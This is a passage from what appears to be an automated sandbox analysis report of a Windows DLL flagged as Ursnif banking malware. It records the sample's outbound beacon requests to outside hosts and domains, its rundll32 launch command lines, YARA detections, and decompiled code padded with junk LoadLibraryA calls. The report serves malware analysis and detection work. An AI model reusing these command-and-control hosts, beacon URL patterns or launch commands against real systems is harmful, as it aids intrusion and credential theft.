                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                        Session ID: 4 | Source IP: 192.168.2.5 | Source Port: 49816 | Destination IP: 194.76.226.200 | Destination Port: 80 | Process: C:\Windows\System32\loaddll32.exe
                        Timestamp: Jan 26, 2022 17:05:34.308445930 CET | kBytes transferred: 17926 | Direction: OUT | Data:
                        GET /drew/t4UXVVFvbg_2F3LXo8gXBT/1icGJdsG14mTA/YOVrBwZF/xARqsNBXczJePkKt2X6ww_2/BWmoPwSUrF/dMkwNYvCaezjn8JBl/H0ytvGxBbW3l/zR2N_2BHrz_/2FvsAN_2FRzTTC/lSSKBusA2w75D7HkZKGJs/DACOMqt0XK0wSfc5/bo0iFsZeiFg2i2l/JDzyY2V7hheHpK0ocJ/ZgcshLwb0/jlOmaQmjqFbHJJo3m7Pt/o4K7mLse1jm/1K47Z.jlk HTTP/1.1
                        Cache-Control: no-cache
                        Connection: Keep-Alive
                        Pragma: no-cache
                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                        Host: 194.76.226.200
                        Timestamp: Jan 26, 2022 17:05:34.582305908 CET | kBytes transferred: 17927 | Direction: IN | Data:
                        HTTP/1.1 404 Not Found
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Wed, 26 Jan 2022 16:05:34 GMT
                        Content-Type: text/html; charset=utf-8
                        Content-Length: 548
                        Connection: keep-alive
                        Vary: Accept-Encoding
                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                        Session ID: 5 | Source IP: 192.168.2.5 | Source Port: 49825 | Destination IP: 181.129.180.251 | Destination Port: 80 | Process: C:\Windows\System32\loaddll32.exe
                        Timestamp: Jan 26, 2022 17:05:55.173449993 CET | kBytes transferred: 18600 | Direction: OUT | Data:
                        GET /drew/vDXEGqf4EaI6e/GBZCusNA/wGFZ17UZEew5_2F3lztpfux/SlqAMrP7W1/XBD36Fnf1Eq7wA6HD/bZQhlGWv2oMx/02wZPYg1S9_/2FsBPVVzIGiliu/ZgesoO3_2BU1Itp9mWBBQ/zS9Fa06G7Ifi1Qdi/yVB_2BRlu8Zp_2B/LJtKQv4YtcqH6IAzxR/L6Ho0ZvfB/evXUKtmzU_2B4Fe1cs5B/1wJA25jdSjnKCVAyqP7/xAdhGKLVvM/CvkvXIJYGs/9.jlk HTTP/1.1
                        Cache-Control: no-cache
                        Connection: Keep-Alive
                        Pragma: no-cache
                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                        Host: giporedtrip.at
                        Timestamp: Jan 26, 2022 17:05:56.107831001 CET | kBytes transferred: 18601 | Direction: IN | Data:
                        HTTP/1.1 404 Not Found
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Wed, 26 Jan 2022 16:05:55 GMT
                        Content-Type: text/html; charset=utf-8
                        Content-Length: 548
                        Connection: close
                        Vary: Accept-Encoding
                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                        Session ID: 6 | Source IP: 192.168.2.5 | Source Port: 49827 | Destination IP: 61.36.14.230 | Destination Port: 80 | Process: C:\Windows\System32\loaddll32.exe
                        Timestamp: Jan 26, 2022 17:06:16.920280933 CET | kBytes transferred: 18609 | Direction: OUT | Data:
                        GET /drew/AvYfyTR_2B2G3/_2F4h5ah/TJ34ZXtaMR1Oc3_2BPI0hI4/GdwumcM9XU/qAwknuMeebVU2QdSF/VN2ToaIYsZPU/kI1do_2B9jW/Q9gfyv85CoHPvT/SnqcLw3TTcQW61PNrLWiv/_2BkKhdRaMJkT9HD/82Fg3tERnOrn6Yg/fT2SNRr4ih8M1B9lEq/WIX8riitn/8yNrCBKJNgpm3khA4gSx/B8X3zDAJaQCYV1F4k99/jQHMcxYL/Il8wT6lWu/Ih.jlk HTTP/1.1
                        Cache-Control: no-cache
                        Connection: Keep-Alive
                        Pragma: no-cache
                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                        Host: habpfans.at
                        Timestamp: Jan 26, 2022 17:06:18.136353016 CET | kBytes transferred: 18610 | Direction: IN | Data:
                        HTTP/1.1 404 Not Found
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Wed, 26 Jan 2022 16:06:17 GMT
                        Content-Type: text/html; charset=utf-8
                        Content-Length: 548
                        Connection: close
                        Vary: Accept-Encoding
                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                        Session ID: 7 | Source IP: 192.168.2.5 | Source Port: 49828 | Destination IP: 31.214.157.187 | Destination Port: 80 | Process: C:\Windows\System32\loaddll32.exe
                        Timestamp: Jan 26, 2022 17:06:38.188649893 CET | kBytes transferred: 18611 | Direction: OUT | Data:
                        GET /drew/XdSo6qg_2FEgYysST/WOvXNJFccrJx/zVwG0bEZwA1/FgOrwJqVq8qQMt/gJKBdkHK_2BRbM8cGXljg/dR5mjLhLFYJj3437/sCPrzkqYN8vu4UK/Lv8bHqBMBEjz1n4JUX/xuOm6McxD/U7cQGMW7Bxk_2BVYpR1Y/2dwD1RGZgWHtptGZcjA/6KkSFpd8oqg4xHg9j8CKKi/XQJvRiHHSuj0_/2BwWvoV7/60l_2BahFJ3qIHK1CvN87c7/jOCSFwu.jlk HTTP/1.1
                        Cache-Control: no-cache
                        Connection: Keep-Alive
                        Pragma: no-cache
                        User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
                        Host: 31.214.157.187
                        Timestamp: Jan 26, 2022 17:06:38.456873894 CET | kBytes transferred: 18611 | Direction: IN | Data:
                        HTTP/1.1 404 Not Found
                        Server: nginx/1.18.0 (Ubuntu)
                        Date: Wed, 26 Jan 2022 16:06:38 GMT
                        Content-Type: text/html; charset=utf-8
                        Content-Length: 548
                        Connection: keep-alive
                        Vary: Accept-Encoding
                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->



                        Target ID:0
                        Start time:17:03:03
                        Start date:26/01/2022
                        Path:C:\Windows\System32\loaddll32.exe
                        Wow64 process (32bit):true
                        Commandline:loaddll32.exe "C:\Users\user\Desktop\hFGZpat9Mf.dll"
                        Imagebase:0x8b0000
                        File size:116736 bytes
                        MD5 hash:7DEB5DB86C0AC789123DEC286286B938
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:Borland Delphi
                        Yara matches:
                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000002.777601117.0000000002A09000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.481994883.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.302599061.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.302425761.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.302331542.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000002.776718826.00000000009E0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.302218181.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.302044791.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000002.776603802.0000000000890000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000000.00000002.776641923.00000000008A0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.301848056.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.302504649.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.301661083.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000002.777721996.0000000002FD8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                        Reputation:high

                        Target ID:1
                        Start time:17:03:04
                        Start date:26/01/2022
                        Path:C:\Windows\SysWOW64\cmd.exe
                        Wow64 process (32bit):true
                        Commandline:cmd.exe /C rundll32.exe "C:\Users\user\Desktop\hFGZpat9Mf.dll",#1
                        Imagebase:0x150000
                        File size:232960 bytes
                        MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        Target ID:3
                        Start time:17:03:04
                        Start date:26/01/2022
                        Path:C:\Windows\SysWOW64\rundll32.exe
                        Wow64 process (32bit):true
                        Commandline:rundll32.exe "C:\Users\user\Desktop\hFGZpat9Mf.dll",#1
                        Imagebase:0x1360000
                        File size:61952 bytes
                        MD5 hash:D7CA562B0DB4F4DD0F03A89A1FDAD63D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:Borland Delphi
                        Yara matches:
                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000000.253570198.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000002.315781287.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000000.253536439.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000002.315692460.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000000.254119232.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000000.253543214.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000000.254127070.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000000.254160040.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000003.00000002.315717603.0000000000EE0000.00000040.00000800.00020000.00000000.sdmp, Author: Joe Security
                        Reputation:high

                        Target ID:7
                        Start time:17:03:07
                        Start date:26/01/2022
                        Path:C:\Windows\SysWOW64\WerFault.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3272 -s 684
                        Imagebase:0x930000
                        File size:434592 bytes
                        MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high


                          Execution Graph

                          Execution Coverage:1.9%
                          Dynamic/Decrypted Code Coverage:100%
                          Signature Coverage:12.2%
                          Total number of Nodes:329
                          Total number of Limit Nodes:9
17594->17596 17595->17592 17595->17594 17597 71707c 4 API calls 17596->17597 17598 736478 17597->17598 17598->17594 17600 7390bb 17599->17600 17601 7390ef 17599->17601 17600->17601 17602 7390c3 SetWindowPos 17600->17602 17601->17590 17602->17601 17603 7017cc 17604 7017e8 17603->17604 17605 7017f2 17604->17605 17608 7017fe 17604->17608 17610 701843 17604->17610 17616 701524 17604->17616 17624 701420 17604->17624 17612 7016b8 17605->17612 17628 701600 17610->17628 17614 7016fe 17612->17614 17613 70172e 17613->17608 17614->17613 17615 70171a VirtualAlloc 17614->17615 17615->17613 17615->17614 17617 701533 VirtualAlloc 17616->17617 17619 701560 17617->17619 17620 701583 17617->17620 17632 7013d8 17619->17632 17620->17604 17623 701570 VirtualFree 17623->17620 17625 70143c 17624->17625 17626 7013d8 LocalAlloc 17625->17626 17627 701482 17626->17627 17627->17604 17631 70162f 17628->17631 17629 701688 17629->17608 17630 70165c VirtualFree 17630->17631 17631->17629 17631->17630 17635 701380 17632->17635 17636 70138c LocalAlloc 17635->17636 17637 70139e 17635->17637 17636->17637 17637->17620 17637->17623 17638 76b448 17649 70615c 17638->17649 17641 76bad5 17642 76bae9 StrokePath 17641->17642 17642->17642 17643 76bb02 17642->17643 17653 719790 17643->17653 17645 76bb73 17646 76bda3 17645->17646 17647 76bcfd StrokePath StrokePath StrokePath StrokePath 17645->17647 17647->17645 17648 76bdf0 17650 706167 17649->17650 17657 703d0c 17650->17657 17654 71979a 17653->17654 17708 719850 FindResourceA 17654->17708 17656 7197c1 17656->17645 17658 703d52 17657->17658 17661 703cac 17658->17661 17662 703ce8 165 API calls 17661->17662 17663 703cbb 17661->17663 17662->17641 17662->17648 17663->17662 17665 705340 17663->17665 17666 705350 GetModuleFileNameA 17665->17666 17667 70536c 17665->17667 17669 70557c GetModuleFileNameA RegOpenKeyExA 17666->17669 17667->17663 17670 7055ff 17669->17670 17671 7055bf RegOpenKeyExA 17669->17671 17687 7053c4 GetModuleHandleA 17670->17687 17671->17670 17672 
7055dd RegOpenKeyExA 17671->17672 17672->17670 17675 705688 lstrcpyn GetThreadLocale GetLocaleInfoA 17672->17675 17678 7057a2 17675->17678 17679 7056bf 17675->17679 17676 705644 RegQueryValueExA 17677 705662 RegCloseKey 17676->17677 17677->17667 17678->17667 17679->17678 17681 7056cf lstrlen 17679->17681 17682 7056e7 17681->17682 17682->17678 17683 705734 17682->17683 17684 70570c lstrcpyn LoadLibraryExA 17682->17684 17683->17678 17685 70573e lstrcpyn LoadLibraryExA 17683->17685 17684->17683 17685->17678 17686 705770 lstrcpyn LoadLibraryExA 17685->17686 17686->17678 17688 7053ec GetProcAddress 17687->17688 17689 70542c 17687->17689 17688->17689 17690 7053fd 17688->17690 17691 70554e RegQueryValueExA 17689->17691 17701 70545f 17689->17701 17704 7053b0 17689->17704 17690->17689 17694 705413 lstrcpyn 17690->17694 17691->17676 17691->17677 17692 705472 lstrcpyn 17698 705490 17692->17698 17694->17691 17695 70553a lstrcpyn 17695->17691 17697 7053b0 CharNextA 17697->17698 17698->17691 17698->17695 17698->17697 17700 7054af lstrcpyn FindFirstFileA 17698->17700 17699 7053b0 CharNextA 17699->17701 17700->17691 17702 7054da FindClose lstrlen 17700->17702 17701->17691 17701->17692 17702->17691 17703 7054f9 lstrcpyn lstrlen 17702->17703 17703->17698 17706 7053b8 17704->17706 17705 7053c3 17705->17691 17705->17699 17706->17705 17707 7053b2 CharNextA 17706->17707 17707->17706 17709 719875 EnumWindows 17708->17709 17710 71987c LoadResource 17708->17710 17709->17710 17711 719896 SizeofResource LockResource 17710->17711 17712 71988f EnumWindows 17710->17712 17713 7198b4 17711->17713 17712->17711 17713->17656

                          Control-flow Graph (legend: Executed / Not Executed; graph widget data omitted; entry block 76b448-76bacf calls 70615c, LoadLibraryA * 164 and LoadIconA; later blocks call 703f78, 719790, 706c7c, 7190d4, 706c74 and StrokePath * 4)
                          C-Code - Quality: 100%
                          			_entry_() {
                          
                          				E0070615C(0x76b028);
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				LoadLibraryA("fadfadfadad"); // executed
                          				if (LoadIconA(0, 0x113c) != 0) goto 0x76bdf0;
                          			}



                          Instruction addresses, one per statement above: 0x0076b454 (call to E0070615C), then 0x0076b45e through 0x0076babc in steps of 0xA (the 164 LoadLibraryA calls), then 0x0076bacf (LoadIconA)

                          APIs
                          • LoadLibraryA.KERNEL32(fadfadfadad), ref: 0076B45E
                          • LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad), ref: 0076B468
                          • LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad), ref: 0076B472
                          • LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 0076B47C
                          • LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 0076B486
                          • LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 0076B490
                          • LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 0076B49A
                          • LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 0076B4A4
                          • LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 0076B4AE
                          • LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 0076B4B8
                          • LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 0076B4C2
                          • LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 0076B4CC
                          • LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 0076B4D6
                          • LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 0076BA62
                          • LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 0076BA6C
                          • LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 0076BA76
                          • LoadLibraryA.KERNEL32(fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad,fadfadfadad), ref: 0076BA80
